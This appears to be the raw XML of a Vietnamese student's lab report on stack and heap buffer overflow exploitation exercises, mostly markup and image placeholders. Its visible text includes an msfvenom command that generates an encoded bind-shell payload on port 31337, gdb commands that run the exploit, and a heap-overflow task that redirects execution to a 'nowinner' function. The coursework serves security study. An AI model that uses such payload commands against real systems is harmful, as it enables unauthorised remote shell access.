            <wp:docPr id="14015003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0C26" w14:textId="77777777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$sudo msfvenom -p linux/x86/shell_bind_tcp LPORT=31337 AppendExit=true -e x86/alpha_mixed -f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCD3B7" w14:textId="77777777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</w:p>
    <w:p w14:paraId="05E2D905" w14:textId="77777777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</w:p>
    <w:p w14:paraId="6AAC3782" w14:textId="77777777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nano ex3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA53E2" w14:textId="77777777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gdb -q ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D10741" w14:textId="77777777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run $(./ex3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B100FB9" w14:textId="11C18F5B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381A0A3E" wp14:editId="4DDC2699">
            <wp:extent cx="5731510" cy="2830195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1743656283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EE24" w14:textId="77777777" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="Thngthng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ss -pant | grep 31337 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4D921" w14:textId="77777777" w:rsidR="003528E9" w:rsidRDefault="003528E9" w:rsidP="003528E9">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118CFB0A" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00BF38CC">
      <w:pPr>
        <w:pStyle w:val="ThngthngWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DF7192" w14:textId="77777777" w:rsidR="00980F78" w:rsidRDefault="00980F78" w:rsidP="00D72F3F"/>
    <w:p w14:paraId="1A87FD78" w14:textId="26F868F6" w:rsidR="00D72F3F" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Câu 3: Khai thác lỗi Heap-based Buffer Overflow trên Linux 64 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6253774B" w14:textId="6E13AB40" w:rsidR="003436B5" w:rsidRDefault="00D72F3F" w:rsidP="00D72F3F">
      <w:r>
        <w:t>3.1. Tham khảo hướng dẫn khai thác lỗi Heap-based buffer overflow link bên dưới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2035CEAA" w14:textId="0516C5AB" w:rsidR="00E04751" w:rsidRDefault="00226C25" w:rsidP="00D72F3F">
      <w:r w:rsidRPr="00226C25">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55A9DDB4" wp14:editId="40D6F89B">
            <wp:extent cx="5731510" cy="1983740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5207409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409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5711" w14:textId="7FDA6351" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Xem mã nguồn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2815EF1A" w14:textId="73F6B175" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25">
      <w:r w:rsidRPr="00226C25">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A02D7A7" wp14:editId="7962CA43">
            <wp:extent cx="5731510" cy="4618355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6961437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437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BDEB" w14:textId="6DE7190B" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25">
      <w:r>
        <w:t>-Quan sát đóng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27494F70" w14:textId="32D9F03B" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25">
      <w:r w:rsidRPr="00226C25">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE1C64C" wp14:editId="1D7E59CB">
            <wp:extent cx="5731510" cy="6143625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="17559828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828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5F37" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="1A238E3E" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="6E4C1C6C" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="77031629" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="690560A8" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="2E8CB60D" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="566D787B" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="5148D460" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="28CA26EA" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="3442CF18" w14:textId="64459667" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0x400629 trên hệ thống x/130x 0x804b000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08DA8A" w14:textId="2B9ED9D6" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25">
      <w:r w:rsidRPr="00226C25">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0817B4AC" wp14:editId="016EB7AD">
            <wp:extent cx="5731510" cy="4177030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12500315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315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9A05" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="34E1755F" w14:textId="0C511428" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25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t xml:space="preserve">Tìm chức năng “nowinner”: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>disassemble nowinner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29012DE2" w14:textId="5EB247D1" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25">
      <w:r w:rsidRPr="00226C25">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="787A1902" wp14:editId="4EE3FA3F">
            <wp:extent cx="5731510" cy="2343785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21336642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642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A332" w14:textId="77777777" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25"/>
    <w:p w14:paraId="614AB1E7" w14:textId="39066715" w:rsidR="00226C25" w:rsidRDefault="00226C25" w:rsidP="00226C25">
      <w:r w:rsidRPr="00226C25">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45AD50D8" wp14:editId="38DECA79">
            <wp:extent cx="5731510" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11177078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078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C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15B28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E616728C"/>
    <w:lvl w:ilvl="0" w:tplc="50C04BF2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460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8CC"/>
    <w:rsid w:val="00226C25"/>
    <w:rsid w:val="002B749A"/>
    <w:rsid w:val="003436B5"/>
    <w:rsid w:val="003528E9"/>
    <w:rsid w:val="004859EC"/>
    <w:rsid w:val="007078BE"/>
    <w:rsid w:val="00980F78"/>
    <w:rsid w:val="00BF38CC"/>
    <w:rsid w:val="00D47720"/>
    <w:rsid w:val="00D72F3F"/>
    <w:rsid w:val="00E0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DBFA9E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{88D1081E-E439-49AF-8040-FE5B0A54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BF3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vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="oancuaDanhsach">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Binhthng"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00226C25"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Siuktni">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Phngmcinhcuaoanvn"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003528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amsclass.info/127/proj/ED3a.c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14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trần</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>phúc trần</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-22T08:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-22T10:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>